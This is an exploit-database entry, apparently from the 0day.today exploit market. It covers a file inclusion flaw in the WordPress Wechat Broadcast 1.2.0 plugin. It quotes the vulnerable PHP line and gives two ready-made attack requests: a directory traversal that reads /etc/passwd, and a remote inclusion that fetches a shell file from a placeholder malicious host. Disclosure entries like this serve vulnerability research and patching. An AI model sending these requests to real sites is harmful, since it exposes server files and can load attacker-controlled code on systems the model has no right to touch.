[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Wechat Broadcast 1.2.0 Plugin - Local File Inclusion Vulnerability

Author
Manuel Garcia Cardenas
Risk
[
Security Risk High
]
0day-ID
0day-ID-31131
Category
web applications
Date add
19-09-2018
Platform
php
# Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Software link: https://es.wordpress.org/plugins/wechat-broadcast/
# CVE: N/A
 
# Description
# This bug was found in the file: /wechat-broadcast/wechat/Image.php
# echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
# The parameter "url" it is not sanitized allowing include local or remote files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol 
# to interact with the application.
 
# PoC
# The following URL have been confirmed that is vulnerable to local and remote file inclusion.
 
GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
 
# Remote File Inclusion POC:
 
GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt

#  0day.today [2024-11-15]  #